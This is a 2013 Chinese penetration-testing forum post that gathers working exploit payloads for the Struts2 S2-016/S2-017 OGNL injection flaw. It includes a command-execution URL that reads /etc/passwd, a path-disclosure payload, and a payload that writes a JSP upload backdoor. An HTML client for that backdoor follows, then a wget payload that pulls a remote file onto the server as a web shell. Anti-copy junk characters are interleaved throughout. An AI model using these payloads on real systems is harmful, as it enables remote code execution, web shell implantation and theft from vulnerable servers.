找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Struts2 S2-016/S2-017漏洞执行代码
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3488|回复: 0
打印 上一主题 下一主题

Struts2 S2-016/S2-017漏洞执行代码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-18 23:03:05 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。: m, J0 k6 u% n, F
  ]3 H3 x) P1 d( a6 T& F
喜欢就点一下感谢吧^_^. [3 U  a; v9 O

) b& t4 e- L$ L9 b+ \. M0 c带回显命令执行:
8 k" p% }7 W# ~$ _8 o3 h. A; v; ^+ g2 D
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}6 `3 J/ f& y+ G" A8 V% x2 K. K

& G3 i% ^! Y3 d- P5 z. ?' }5 z+ F2 a

; z6 X" ~; I$ G& y; P6 [- R5 U
. v( [9 ]+ A8 l* J) o9 }8 Q7 }: A- z! v0 f

3 e/ s5 d4 m+ a  G' }$ R3 z, b. Q: F4 J. y
爆路径:
5 ?/ v9 i" q& p0 u2 X, T
( n/ o1 O% ?$ r7 ohttp://www.example.com/struts2-b ... 8%29.close%28%29%7D0 O" H5 g7 R2 D# `5 p4 w+ m* }

1 |& V  e3 F( R* j8 x' L
- H( l) i' T3 ^6 v' m
+ p1 o* y1 `) z& C" M9 r4 s; N- P$ E- {' v  I2 j6 g
# [5 M4 v9 w' B
写文件:# l+ j* J. z3 @9 `2 P
$ _7 x. q9 d8 Q3 A* ~' W0 h2 Y
http://www.example.com/struts2-blank/example/X.action?redirect:${
  r7 b& w% L/ Y( q6 F) p' j) A  u  U
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),- }' @# C. [, ~$ L* F
6 p$ o; i. _, s9 r+ T1 }6 r# x& \
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),' `# [9 k. ~8 W0 N; c
2 z  r- K: f( ?+ Z
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()# i+ k- i. {2 t8 b9 L

& L6 A2 E: ]+ g/ G- R/ E& o% z}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e- |, F3 e0 v. U2 T: d4 e( f8 T* [

) Y( L! |) q; D# e. J, k9 g/ v  N$ y

7 z" J" @/ c# X) a9 g写入的文件内容:
3 [, T: U$ y% J. ]9 t
3 q* v! W: K: z& T<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      
4 y3 i# a0 ?& o
$ \( K5 I) n& V0 u  x其实就是一个jsp的小马,需要客户端配合                                                                                  " v0 x& Z  W9 N1 K& F

- k8 ^0 g6 T2 c函数f是文件名,t是内容% J% o/ S3 F* R- W+ W  q- R

3 l3 `# S/ c4 Q7 x% b3 s  X" L客户端:
& L. X# ~% Q( h* E
/ z6 a# L; X" n- T: {  \<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
0 \6 B% t$ N9 m7 ~" [+ o, W
( s9 Q9 F- ~1 w& B<textarea name=t cols=120 rows=10 width=45>your code</textarea>: x2 `; Y- ~+ O5 ~( b3 Z- l# C
3 U5 r, e8 Z& R( Y9 I; ]+ U% H
<center>
; t5 X! Z7 @) @' p/ \
& Y; s7 P7 ^* ^+ F, a/ n# k7 ^1 W  z" l, F+ U$ e

( P; g% ^' U5 }+ S<input type=submit value="提交">
. t' ]! g: e) F: t' R. X( G2 m& [
5 }3 u1 h- Z/ I+ |2 C+ f; u</form>* s" ]/ x1 e9 @6 ?
3 b. t* z8 @+ T6 N# L7 }4 |, X
就在当前目录建立一个fjp.jsp6 E& f1 v0 R/ P9 e: u6 K- ^- T
/ Z) H4 O, _& a2 Q0 M
shell:http://www.example.com/struts2-blank/example/fjp.jsp
- m0 u. P* f+ v' M5 y
0 r" t( {9 C) ~- Y
+ I0 R4 a/ ~- c7 I' r$ T
4 a7 H6 s2 d* Z7 I7 m还有@园长的一个客户端:! g& k, _6 \+ b$ W3 D

! Q# h6 h, a; L9 V, ]2 g3 g0 K<html>
! B/ g: b, K! u- o+ U
- }3 _  j& o5 _% W" s+ u* v4 v<head>5 u) \) z# R. ?6 E" i- E' O: h, t' x
) t8 P5 g3 V/ m# l( N# o0 P7 E
<meta http-equiv="content-type" content="text/html;charset=utf-8">
1 T( ~$ F. p: {3 @! L# M" e; B4 w* b- N& e* a4 \
<title>jsp-园长</title>8 Z+ x6 W0 R5 M0 x
+ _- u; k* n  q! g1 C8 M5 f
</head>
8 M9 F; e. Q7 a1 q: L  Q$ @) p/ N: R  Z& Z' R3 T' f0 G
<style>( F5 a$ K8 c2 Z6 k" q! `3 j

& K* @4 U3 v7 w. h3 C4 W.main{width:980px;height:600px;margin:0 auto;}) N  {1 ?4 i' e8 n

# F, ^# m' a# S, t( l0 s.url{width:300px;}
6 n2 Z% i, c" O& ^! a# b! o$ \8 `- h9 ^- p1 ]3 r
.fn{width:60px;}! v; y: ^) U& a) D8 D& V- X6 t2 q
4 V; `- H" a  ~! a- O; h; t
.content{width:80%;height:60%;}
! [, g2 c: e7 \% T1 F" \
# l  u3 T6 U3 P. g) _( K: {</style>
) P# u  J1 o7 ]2 G) H: J. r8 M6 R; X- i! K% ~8 ~! F
<script>
% X9 s6 w0 b9 g0 q$ ^/ O9 O2 n6 S
  function upload(){- J1 L% g4 i3 f* `5 _, m6 @; x" t# N

" a$ o3 H6 L/ S% d# G: u/ P0 F7 d7 }    var url = document.getElementById('url').value,+ ~2 a$ ?4 v! e. b8 o

6 t' n. C1 T, V& f/ M8 {& A9 u      content = document.getElementById('content').value,* V$ c% ?: q$ @/ a4 t  c

% z8 X1 G* ^' I      fileName = document.getElementById('fn').value,
. h# j' a) b1 @' g# C7 Y3 x, ^  v
1 _& k' x. {5 @3 E! }& y/ ^      form = document.getElementById('fm');
# K( V% p7 _! n5 _! k8 k( E: j" S; x/ \
    if(url.length == 0){
5 d) Y) h4 q) P6 m; L! T; n) h- |$ q
. q! R" a  R, {! J8 S      alert("Url not allowd empty!");7 [, K2 f; R& p' Y( j9 C4 N% O9 J

$ G/ ~9 N; E3 @      return ;
& D; P# d) u+ u, g" ^: U3 n( F/ C* j  M& ]1 G
    }
$ X- {; |; X. ]( D0 s
# N1 T) h$ Q  r; c1 c" w    if(content.length == 0){
$ y7 i+ C- j9 f& \* e% W# h5 ?+ }  M
      alert("Content not allowd empty!");* r, q2 H' K4 d/ o! ^9 m

/ c. r; I$ z+ }+ n( w. r      return ;
4 s( g. p& B# v+ q/ j* G. ]7 \0 b8 I% X
    }" ^0 m% Z- ^6 _) A, f2 }
! x& u- c! s" g
    if(fileName.length == 0){3 _% w: [8 p4 ^; ^/ d
6 e5 ~' G& M5 H( L5 q" T( g
      alert("FileName not allowd empty!");
5 r+ \4 E; s3 \# e& y  b* i* d" |
# ]4 {( T/ @  l0 D: w      return ;  ^! C5 c* w4 L

, ~3 W, d* z" o4 i. H) ^( ~    }
3 o: F- I6 ^/ u1 _. T5 U; G8 l* T( t
    form.action = url;$ w2 q; ^6 e* R4 n- B6 [  d
: M: d# n4 }5 a& m
    form.submit();
7 }) d2 K7 V! e% U/ k6 u- o- U; R
( z5 N1 t6 w$ J  }% @) I! E+ A& F3 C' T. a

9 B& ^5 g. H- k* h+ m</script>
2 l9 o9 u' V& M  B4 Q7 V1 S; {+ ?
/ Q7 O+ E6 z/ I/ }<body>
" w# I; Y, F, P8 b+ D( Y
0 x9 @6 h+ f9 {5 L<div class="main">
( v+ W; |# }2 E- O
4 A5 |; x: J5 p: x4 n) F' v  <form id="fm" method="post">  7 Y% \2 D4 P* {9 }0 {/ X1 g$ M; l

) E9 p. ]7 z4 \! G    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  / R7 i2 b# m1 h' g8 U2 q5 p4 {
6 E- X; J' O6 T/ M6 r
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
) j) \3 x- e$ P  U1 c. e  w
% F8 t9 B4 V1 X) B1 `    <a href="javascript:upload();">Upload</a>
2 }3 z6 q3 e, s0 n4 j3 _( N7 {
$ X$ W: K1 L( \. V
, J* L6 E3 z* y6 \; E0 s! c3 {% Y3 h7 O9 f& ~% P  c0 l% M5 l
    <textarea id="content" class="content" name="t" ></textarea>
4 O7 k6 i: N- R$ e$ x3 S2 g* A8 f, a4 {. P% Z
  </form>6 [& [% G' m" ~* }: _: m" w7 d

- X+ z: a! `7 B</div>
  f8 z7 x0 H' M+ F
" X, `8 o- Q6 E1 D6 |- R1 B( |9 Q7 c</body>
% p0 B5 u) c$ H: {- l1 a' H# m& w( g& c7 C/ p
</html>
7 e8 C; K- Z( G8 ?& e- A& ?* e' c# k+ L$ W( }0 A

: v( o- t9 ], x  h' o7 B- [/ v: @. e# R! F
还有@X发的一个wget的getshell+ w" M! E2 t8 `& j& {* l
4 ?1 a: [2 Z% k! S& H
?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}' ^2 H" P" E6 Y: o' W* ?* M
; N# J5 U& L" x* w! F1 v
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}8 z# l  p/ n- W$ R- O( q
复制代码
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表